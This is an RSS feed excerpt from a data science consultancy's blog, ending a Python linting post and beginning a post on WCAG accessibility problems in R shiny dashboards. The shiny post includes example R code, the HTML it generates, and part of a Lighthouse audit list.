&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;additional_dependencies&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;[&lt;span style="color:#a5d6ff"&gt;pylint==2.13.4]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you want to use nqba with a specific version of a tool then you can specify this in the &lt;code&gt;additional_dependencies&lt;/code&gt; field (as above).&lt;/p&gt;
&lt;h2 id="further-reading"&gt;Further reading&lt;/h2&gt;
&lt;p&gt;We hope you found this post useful!&lt;/p&gt;
&lt;p&gt;This is by no means intended as a complete guide. If you wish to explore linters and formatters further, we recommend the following links:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;For more information about how paired notebooks work: &lt;a href="https://jupytext.readthedocs.io/en/latest/paired-notebooks.html" rel="external"&gt;https://jupytext.readthedocs.io/en/latest/paired-notebooks.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;For more advanced usage of pre-commit hooks: &lt;a href="https://pre-commit.com/#advanced" rel="external"&gt;https://pre-commit.com/#advanced&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Some other popular linters include:
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://pycodestyle.pycqa.org/en/latest/" rel="external"&gt;pycodestyle&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://mypy.readthedocs.io/en/stable/index.html" rel="external"&gt;mypy&lt;/a&gt; (static type checker for Python)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://pycqa.github.io/isort/" rel="external"&gt;isort&lt;/a&gt; (for sorting imports consistently)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Another popular auto-formatter is &lt;a href="https://pypi.org/project/autopep8/" rel="external"&gt;autopep8&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/python-linting-guide/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Accessibility in R applications: {shiny}</title><link>https://www.jumpingrivers.com/blog/accessible-shiny-standards-wcag/</link><pubDate>Thu, 19 May 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/accessible-shiny-standards-wcag/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/accessible-shiny-standards-wcag/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/accessible-shiny-standards-wcag/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part two of our two part series&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: &lt;a href="https://www.jumpingrivers.com/blog/importance-accessibility-standards-shiny-web/" rel="external"&gt;The importance of web accessibility standards&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 2: &lt;a href="https://www.jumpingrivers.com/blog/accessible-shiny-standards-wcag/" rel="external"&gt;Accessibility in R applications: {shiny}&lt;/a&gt; (this post)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Web applications that are &lt;a href="https://www.w3.org/WAI/standards-guidelines/wcag/" rel="external"&gt;Web Content Accessibility Guidelines
(WCAG)&lt;/a&gt; compliant are
becoming an increasingly prominent part of my role as a data scientist
as the importance of ensuring that data products are available to all
takes a more central focus. This is particularly true in the case of
building solutions for public sector organisations in the UK as they are
under a legal obligation to meet certain accessibility requirements.&lt;/p&gt;
&lt;p&gt;{shiny} has, for some time now, been a leading route that statisticians,
analysts and data scientists might take to provide a web based
application as a graphical user interface to data manipulation,
graphical and statistical tooling that may otherwise only be easily
accessible to R programmers.&lt;/p&gt;
&lt;p&gt;At &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt; we were recently
tasked with taking a prototype product, which we initially helped to
develop in {shiny}, to a public facing production environment for a
public sector client. This blog post highlights some of the thoughts
that arose throughout the scoping stage of that project when assessing
{shiny} as a suitable candidate for the final solution.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-accessible-shiny-standards-wcag"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="accessibility-and-shiny"&gt;Accessibility and {shiny}&lt;/h2&gt;
&lt;h3 id="the-good"&gt;The good&lt;/h3&gt;
&lt;p&gt;The great thing about {shiny} is that it allows data practitioners a
relatively simple, quick approach to providing an intuitive user
interface to their R code via a web application. So effective is {shiny}
at this job that it can be done with little to no traditional web
development knowledge on the part of the developer. {shiny} and
associated packages provide collections of R functions that return HTML,
CSS and JavaScript which is then shipped to a browser. The variety of
packages giving trivial access to styled front end components and
widgets is already large and constantly growing. What this means is that
R programmers can achieve a huge amount in the way of building complex,
visually attractive web applications without needing to care very much
about the underlying generated content that is interpreted by the
browser.&lt;/p&gt;
&lt;p&gt;Need a tidy menu to drive navigation around your application?
{shinydashboard} is a fine choice. If you want an attractive table to
display data, that also facilitates download, sorting, pagination plus
numerous other “bolt-ons” then many R users will point you in the
direction of {DT}. {plotly} has you covered for interactive charts,
again allowing you to do things like download snapshots from your plots
for use elsewhere.&lt;/p&gt;
&lt;p&gt;This sort of technology is absolutely fantastic for prototyping
products. The feedback loop through iteration from initial idea,
manipulation and modelling code, rough design and layout to usable and
deployable application can be phenomenally fast. That is not to say that
shiny is completely inappropriate beyond the prototyping stage, just
that, certainly in my opinion, this is absolutely one of its biggest
strengths.&lt;/p&gt;
&lt;h3 id="the-bad"&gt;The bad&lt;/h3&gt;
&lt;p&gt;If it is good that shiny allows data and statistics experts to create
web applications without any real knowledge of front end technology then
it is almost certainly also bad that shiny allows data and statistics
experts to create web applications without any real knowledge of front
end technology. To my mind, its big strength is also a weakness. Much or
all of the browser interpreted content is generated for you. This is
particularly prominent when considering WCAG compliance.&lt;/p&gt;
&lt;p&gt;Let’s take a look at how some of this problem is manifested:&lt;/p&gt;
&lt;p&gt;Consider the following snippet of code which I suspect is something
reflective of a large number of shiny applications given the popularity
of the package.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;shinydashboard&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; shinydashboardPlus&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; skin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;purple&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; header &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardHeader&lt;/span&gt;(title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;My App&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sidebar &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardSidebar&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sidebarMenu&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sidebarMenu&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;menuItem&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Home page&amp;#34;&lt;/span&gt;, tabName &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Home&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; body &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardBody&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;dashboardBody&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tabItems&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tabItem&lt;/span&gt;(tabName &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Home&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello Dashboard&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Note that I would typically namespace all function calls&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# and encourage others to do the same, however for the&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# purpose of a blog post, loading the packages via `library`&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# may make it a little easier to read on small screen formats.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If we were to start a shiny app in the usual sort of way&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(input, output, session){
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# empty server function&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# not important for discussion but necessary&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# to launch an application.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;shiny&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;shinyApp&lt;/span&gt;(ui, server)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;this gives the not entirely unattractive UI below (subjective I know).&lt;/p&gt;
&lt;p&gt;&lt;img alt="“hello dashboard shiny ui image”" height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/accessible-shiny-standards-wcag/hello-dashboard.png" width="976"&gt;&lt;/p&gt;
&lt;p&gt;It does so by generating the following markup as the output of the R
code which is shipped off to the browser to be rendered.&lt;/p&gt;
&lt;!-- Warning: the following chunk comes fomr print(ui). But to
get syntax highlighting, I've hard-coded it. --&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;body&lt;/span&gt; data-scrollToTop&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;0&amp;#34;&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;hold-transition skin-purple&amp;#34;&lt;/span&gt; data-skin&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;purple&amp;#34;&lt;/span&gt; style&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;min-height: 611px;&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;div&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;wrapper&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;header&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;main-header&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;span&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;logo&amp;#34;&lt;/span&gt;&amp;gt;My App&amp;lt;/&lt;span style="color:#7ee787"&gt;span&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;nav&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;navbar navbar-static-top&amp;#34;&lt;/span&gt; role&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;navigation&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;span&lt;/span&gt; style&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;display:none;&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;i&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;fa-solid fa-bars&amp;#34;&lt;/span&gt; role&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;presentation&amp;#34;&lt;/span&gt; aria-label&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;bars icon&amp;#34;&lt;/span&gt;&amp;gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;i&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;span&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;a&lt;/span&gt; href&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;#&amp;#34;&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;sidebar-toggle&amp;#34;&lt;/span&gt; data-toggle&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;offcanvas&amp;#34;&lt;/span&gt; role&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;button&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;span&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;sr-only&amp;#34;&lt;/span&gt;&amp;gt;Toggle navigation&amp;lt;/&lt;span style="color:#7ee787"&gt;span&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;a&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;div&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;navbar-custom-menu&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;ul&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;nav navbar-nav&amp;#34;&lt;/span&gt;&amp;gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;ul&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;div&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;nav&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;header&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;aside&lt;/span&gt; id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;sidebarCollapsed&amp;#34;&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;main-sidebar&amp;#34;&lt;/span&gt; data-collapsed&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;false&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;section&lt;/span&gt; id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;sidebarItemExpanded&amp;#34;&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;sidebar&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;ul&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;sidebar-menu&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;li&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;a&lt;/span&gt; href&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;#shiny-tab-Home&amp;#34;&lt;/span&gt; data-toggle&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;tab&amp;#34;&lt;/span&gt; data-value&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Home&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;span&lt;/span&gt;&amp;gt;Home page&amp;lt;/&lt;span style="color:#7ee787"&gt;span&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;a&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;li&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;div&lt;/span&gt; id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;sidebarMenu&amp;#34;&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;sidebarMenuSelectedTabItem&amp;#34;&lt;/span&gt; data-value&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;null&amp;#34;&lt;/span&gt;&amp;gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;div&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;ul&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;section&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;aside&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;div&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;content-wrapper&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;section&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;content&amp;#34;&lt;/span&gt; id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;dashboardBody&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;div&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;tab-content&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;div&lt;/span&gt; role&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;tabpanel&amp;#34;&lt;/span&gt; class&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;tab-pane&amp;#34;&lt;/span&gt; id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;shiny-tab-Home&amp;#34;&lt;/span&gt;&amp;gt;Hello Dashboard&amp;lt;/&lt;span style="color:#7ee787"&gt;div&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;div&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;section&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;div&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;div&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;body&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;So what’s the problem? Well, even though our application has almost zero
content to it, it would fail even the most basic of accessibility tests.
Chrome based browsers have a tool, Lighthouse, accessible from the
developer console in the browser, which can provide a report on
accessibility for a web page. This is by no means a comprehensive WCAG
compliance assessment, but seems like a reasonable first hurdle to get
over.&lt;/p&gt;
&lt;p&gt;A Lighthouse report, whilst reminding us that&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Only a subset of accessibility issues can be automatically detected so
manual testing is also encouraged&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;gives the following on our “app”:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Document does not have a &lt;code&gt;&amp;lt;title&amp;gt;&lt;/code&gt; element&lt;/li&gt;
&lt;li&gt;&lt;code&gt;&amp;lt;html&amp;gt;&lt;/code&gt; element does not have a [lang] attribute&lt;/li&gt;
&lt;li&gt;Lists do not only contain &lt;code&gt;&amp;lt;li&amp;gt;&lt;/code&gt; elements and script supporting
elements&lt;/li&gt;
